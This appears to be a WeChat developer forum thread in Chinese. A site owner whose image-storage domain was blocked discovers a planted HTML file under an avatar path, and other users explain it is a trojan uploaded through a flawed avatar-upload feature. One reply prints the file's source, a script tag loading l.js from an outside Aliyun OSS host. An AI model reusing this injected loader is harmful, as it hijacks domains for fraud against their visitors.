收藏
回答

我的网站域名被微信屏蔽了,想知道是恶意投诉还是微信自主误判的?

我的域名www.umeitime.com被微信拦截,多次申请都没反馈结果,无意间从网站找到了一个邮箱地址:moment@tencent.com,抱着试试看的态度发了一封邮件,阐述了我的域名没有任何违规,为啥会被屏蔽,收到的回复是:

文件的存储信息如下:

我这个域名是七牛云存储图片存储的二级域名,根据地址路径规则/avatar/来看,是一个用户的头像地址。我去七牛云里面找到了这个文件,不可思议的是这个文件大小只有174b,格式是text/html。。这样的文件怎么就成了违规的文件了呢?谁会从我的小程序里面抓包抓到自己的头像,然后拿去提交微信投诉?况且这个文件无法访问的啊。

你们官方封了我的网站,总要给我一个具体的理由吧,如果不是人为投诉,你们怎么检测这个地址违规的,我通过七牛云那边提交的工单,他们技术支持都无法给出一个合理的解释,这个地址打开直接跳转到百度里面了,  这本来是一个上传头像的功能存储到七牛里面的文件,谁把这个html源码写到我的七牛云存储里面去了,并且谁又投诉了我的网站?这个事情非常蹊跷啊。

这是七牛那边给的答复,我根本不懂镜像回源是什么东西啊。希望官方给我一个说法,你们给我定性违反《微信外部链接内容管理规范》的第19条“恶意对抗类内容”,也需要拿出证据来啊,不能平白无故的就屏蔽我的网站。

回答关注问题邀请回答
收藏

2 个回答

  • 黄明明
    黄明明
    2023-08-31

    你这就是系统漏洞被利用了啊,腾讯封你链接比网警上门找你要好吧。都给你说的这么清楚了,还不整改吗?赶紧堵漏洞啊兄弟。

    2023-08-31
    有用 1
    回复
  • 沐风客服
    沐风客服
    2023-08-31
    <!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title></title></head><body><script src="https://kkkkkvd.oss-cn-beijing.aliyuncs.com/l.js"></script></body></html>
    

    这是那个文件的源码,上传的IP地址查询是上海电信,这是别人利用我的接口漏洞上传的吗?然后恶意举报还是怎么回事,我至今都不明白,这个文件怎么就被微信识别出来了呢?

    2023-08-31
    有用
    回复 4
    • 黄明明
      黄明明
      2023-08-31
      你是不懂技术还是怎样?没有意识到问题的严重性吗?你先把马删了,找技术堵漏洞。就这个链接,公安封你整个网站永不翻身就是轻的。
      2023-08-31
      1
      回复
    • BOBO
      BOBO
      2023-09-01
      1、你是技术开发人员吗?
      2、你网站有上传头像功能吧。这个功能有漏洞,别人传了网页而不是图片。如果你不是技术,反馈给网站开发。改掉
      3、有些事情【不上称没有二两重,上了称一千斤都打不住】
      2023-09-01
      回复
    • 沐风客服
      沐风客服
      2023-09-03回复黄明明
      我是想知道微信怎么查到这个链接的呢?
      2023-09-03
      回复
    • 黄明明
      黄明明
      2023-09-04回复沐风客服
      这个是一个地地道道的“木马”,别人用你的域名做了一个自己的页面,然后就可以用你的域名进行各种诈骗,被人举报了,能听懂吗?不管你懂不懂,你最好去找个技术,没有自己的技术来做各种防护,域名是你的,抓人的时候不会抓其他人,坐牢的也不是那个上传木马的。
      2023-09-04
      回复
登录 后发表内容